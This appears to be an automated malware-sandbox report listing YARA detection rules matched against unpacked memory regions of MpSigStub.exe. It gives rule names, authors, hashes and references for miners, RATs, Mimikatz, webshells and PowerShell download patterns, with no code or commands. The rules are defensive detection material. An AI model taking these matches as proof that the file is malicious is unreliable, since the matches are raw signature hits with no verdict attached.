Source: 11.3.MpSigStub.exe.21b5fef5492.85.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5f17da55.91.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 11.3.MpSigStub.exe.21b5f293752.82.unpack, type: UNPACKEDPE Matched rule: Greenbug_Malware_4 date = 2017-01-25, hash2 = 82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9, author = Florian Roth, description = Detects ISMDoor Backdoor, reference = https://goo.gl/urp4CD, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f
Source: 11.3.MpSigStub.exe.21b5e61fb1a.149.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5e61fb1a.194.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e61fb1a.194.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5ee2f2ee.94.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 11.3.MpSigStub.exe.21b5fecf96e.116.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 11.3.MpSigStub.exe.21b5fecf96e.116.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 11.3.MpSigStub.exe.21b5fecf96e.116.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f94bc01.172.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5e1c2bca.202.raw.unpack, type: UNPACKEDPE Matched rule: APT_apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 11.3.MpSigStub.exe.21b5e1c2bca.202.raw.unpack, type: UNPACKEDPE Matched rule: apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 11.3.MpSigStub.exe.21b5ee7649a.62.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 11.3.MpSigStub.exe.21b5e21ccf2.17.raw.unpack, type: UNPACKEDPE Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e21ccf2.17.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 11.3.MpSigStub.exe.21b5e61fb1a.206.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e61fb1a.206.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 11.3.MpSigStub.exe.21b5f56923e.105.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 11.3.MpSigStub.exe.21b5eec4df6.63.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 11.3.MpSigStub.exe.21b5eec4df6.63.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5eec4df6.63.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 11.3.MpSigStub.exe.21b5e21e0f6.18.unpack, type: UNPACKEDPE Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5e21e0f6.18.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 11.3.MpSigStub.exe.21b5ee77ca2.61.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 11.3.MpSigStub.exe.21b5fb38b2a.11.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fb38b2a.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5eec4df6.95.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fcdeb9e.188.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fcdc99a.87.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5f94bc01.135.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5f3c65aa.44.raw.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 11.3.MpSigStub.exe.21b5f3c65aa.44.raw.unpack, type: UNPACKEDPE Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 11.3.MpSigStub.exe.21b5f3c65aa.44.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 11.3.MpSigStub.exe.21b5e4c313e.156.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5e4c3d42.158.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5ee2f2ee.94.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 11.3.MpSigStub.exe.21b5ef9a849.112.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef9a849.112.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5f17c82d.93.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 11.3.MpSigStub.exe.21b5e4c253a.157.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 11.3.MpSigStub.exe.21b5f568a3a.106.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 11.3.MpSigStub.exe.21b5f96bf0d.38.raw.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 11.3.MpSigStub.exe.21b5f96bf0d.38.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fe69132.113.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 11.3.MpSigStub.exe.21b5fe69132.113.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5fe69132.113.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 11.3.MpSigStub.exe.21b5e5ccab6.147.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5ef9be4d.110.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef9be4d.110.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5f3c57a6.43.raw.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 11.3.MpSigStub.exe.21b5f3c57a6.43.raw.unpack, type: UNPACKEDPE Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 11.3.MpSigStub.exe.21b5f3c57a6.43.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 11.3.MpSigStub.exe.21b5ef99445.153.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef99445.153.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5ef9a849.152.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 11.3.MpSigStub.exe.21b5ef9a849.152.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5e61fb1a.206.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 11.3.MpSigStub.exe.21b5e721bfe.71.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
